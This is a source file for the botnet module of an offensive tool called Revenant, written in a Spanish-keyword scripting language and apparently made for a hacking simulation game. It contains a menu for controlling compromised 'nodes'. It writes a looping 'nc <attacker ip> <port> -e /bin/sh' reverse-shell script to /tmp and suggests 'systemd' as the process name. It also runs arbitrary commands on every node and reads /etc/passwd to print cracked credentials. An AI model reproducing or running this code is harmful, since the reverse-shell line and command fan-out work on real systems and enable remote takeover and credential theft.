// modulo botnet.nini - El Alma de Revenant

tarea modulo_botnet_menu:
    opciones = [
        {"label": "Ver nodos activos", "cmd": "info"},
        {"label": "Establecer Callback (rshell)", "cmd": "callback"},
        {"label": "Esperar conexiones", "cmd": "server"},
        {"label": "Ejecutar comando en nodos", "cmd": "exec"},
    ]
    
    modo = menu_interactivo("CONTROL DE BOTNET", opciones)
    si not modo: return
    
    si modo == "info":
        modulo_botnet_info()
    osi modo == "callback":
        botnet_establecer_callback()
    osi modo == "server":
        botnet_esperar_conexiones()
    osi modo == "exec":
        botnet_ejecutar_comando()

tarea modulo_botnet_info:
    si enjambre.len == 0:
        error("El enjambre esta vacio. Asalta algum objetivo primero.")
        return
        
    info("Desplegando estado del enjambre (" + enjambre.len + " nodos activos):")
    columnas = ["IP Victima", "Tipo Acceso"]
    filas = []
    
    para nodo en enjambre:
        ip_nodo = nodo.key
        sesion_hash = typeof(nodo.value)
        filas.push([ip_nodo, sesion_hash])
    
    tabla = construir_tabla(columnas, filas)
    print(tabla)

tarea botnet_establecer_callback:
    info("CONFIGURANDO CALLBACK EN OBJETIVO...")
    
    objetivo = globals.objetivo_actual
    si not objetivo:
        error("No hay objetivo seleccionado.")
        return
    
    tu_ip = get_shell.host_computer.local_ip
    info("Tu IP (atacante): " + tu_ip)
    
    puerto = pedir("Puerto de callback (Enter=4444): ")
    si puerto == "":
        puerto = "4444"
    
    proceso = pedir("Nombre del proceso (Enter=systemd): ")
    si proceso == "":
        proceso = "systemd"
    
    comp = obtener_computadora_objetivo()
    si not comp:
        error("No hay sesion activa.")
        return
    
    // Crear script de callback
    contenido = "#!/bin/bash" + char(10)
    contenido = contenido + "while true; do nc " + tu_ip + " " + puerto + " -e /bin/sh; sleep 60; done"
    
    ruta_script = "/tmp/revenant_callback.sh"
    archivo = comp.File(ruta_script)
    si archivo:
        archivo.set_content(contenido)
        comp.chmod("+x", ruta_script)
        exito("Callback configurado en: " + ruta_script)
        info("Para ejecutar: bash " + ruta_script)
    sino:
        error("No se pudo crear el script.")

tarea botnet_esperar_conexiones:
    info("ESPERANDO CONEXIONES DE BOTNET...")
    info("Usa 'nc -lvp <puerto>' para escuchar.")
    
    metax = include_lib("/lib/metaxploit.so")
    si not metax:
        error("Metaxploit no disponible.")
        return
    
    victims = metax.rshell_server
    
    si not victims o victims.len == 0:
        info("No hay conexiones entrantes.")
        return
    
    info("Conexiones activas: " + str(victims.len))
    
    para v en victims:
        info("Nodo conectado: " + typeof(v))

tarea botnet_ejecutar_comando:
    si enjambre.len == 0:
        error("El enjambre esta vacio.")
        return
    
    comando = pedir("Comando a ejecutar: ")
    si comando == "": return
    
    info("Ejecutando en " + str(enjambre.len) + " nodos...")
    
    para nodo en enjambre:
        ip_nodo = nodo.key
        sesion = nodo.value
        
        si typeof(sesion) == "shell":
            sesion.launch("/bin/sh", "-c '" + comando + "'")
            exito("Ejecutado en " + ip_nodo)
        sino:
            error("Sin shell en " + ip_nodo)

tarea modulo_botnet_saquear:
    si enjambre.len == 0:
        error("El enjambre esta vacio.")
        return
        
    info("Iniciando extraccion e iteracion masiva de diccionarios...")
    
    para nodo en enjambre:
        ip_nodo = nodo.key
        sesion = nodo.value
        
        computer_node = null
        si typeof(sesion) == "shell":
            computer_node = sesion.host_computer
        osi typeof(sesion) == "computer":
            computer_node = sesion
            
        si computer_node:
            info("Escaneando /etc/passwd en " + ip_nodo)
            archivo = computer_node.File("/etc/passwd")
            si archivo and archivo.has_permission("r"):
                exito("Sombra obtenida. Desplegando algoritmos crypto...")
                
                contenido_passwd = archivo.get_content
                // Usando macro cruda del auto-hacker API Nini
                crackear_diccionario(contenido_passwd)
                credenciales = __nini_res_crack
                
                si typeof(credenciales) == "map":
                    para cred en credenciales:
                        info("> [VULNERADO] Usuario: " + cred.key + " | Pass: " + cred.value)
                sino:
                    error("Fallo al inyectar auto-hacker crypto.")
            sino:
                error("Proteccion detectada en " + ip_nodo)
